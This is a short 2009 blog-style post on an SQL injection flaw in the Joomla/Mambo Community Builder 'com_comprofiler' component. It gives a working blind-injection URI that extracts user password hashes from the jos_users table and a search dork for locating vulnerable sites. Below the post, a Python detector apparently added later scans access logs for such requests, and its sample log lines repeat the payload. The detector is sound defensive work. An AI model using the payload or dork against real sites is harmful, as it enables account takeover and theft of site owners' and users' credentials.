Tuesday, 24 November 2009

Joomla! and Mambo Community Builder 'com_profiler' Component SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/index.php?option=com_comprofiler&task=userProfile&user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*


Dork:       inurl: "com_comprofiler" 
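
For detection, the check below (an added example, not part of the original advisory) scans web access-log lines for `com_comprofiler` requests whose `user` parameter is not a plain number, as in the example URI above. The log lines are constructed samples, and treating `user` as a numeric ID is an assumption based on the `user=1` in that URI.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# SQL markers of the kind seen in the example URI: inline comments and keywords.
SQL_MARKERS = re.compile(r"/\*|\*/|\b(?:select|union|from|mid|char|limit)\b", re.I)

def check_request(uri):
    """Return a reason string if `user` is suspicious on a com_comprofiler request."""
    query = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    if "com_comprofiler" not in query.get("option", []):
        return None  # other components are out of scope for this check
    for value in query.get("user", []):
        value = unquote(value)  # parse_qs decoded once; this catches double encoding
        if re.fullmatch(r"[0-9]+", value):
            continue  # assumption: a legitimate value is a numeric user ID
        return "sql-markers" if SQL_MARKERS.search(value) else "non-numeric"
    return None

def scan(lines):
    """Return (line_number, reason) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        reason = check_request(match.group(1)) if match else None
        if reason:
            hits.append((number, reason))
    return hits

# Constructed sample log lines (documentation IP addresses, not real traffic).
BASE = "/index.php?option=com_comprofiler&task=userProfile&user="
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Nov/2009:10:00:00 +0000] "GET ' + BASE + '62 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [24/Nov/2009:10:00:03 +0000] "GET ' + BASE
    + '1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)'
    + '/**/</**/Char(97)/* HTTP/1.1" 200 4987',
    '198.51.100.7 - - [24/Nov/2009:10:00:04 +0000] "GET ' + BASE
    + '1%252F%252A%252A%252F HTTP/1.1" 200 4987',
    '203.0.113.9 - - [24/Nov/2009:10:00:09 +0000] '
    '"GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 9001',
    '203.0.113.9 - - [24/Nov/2009:10:00:12 +0000] "GET ' + BASE + 'admin HTTP/1.1" 200 5001',
]

if __name__ == "__main__":
    for number, reason in scan(SAMPLE_LOG):
        print(f"line {number}: {reason}")
```
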






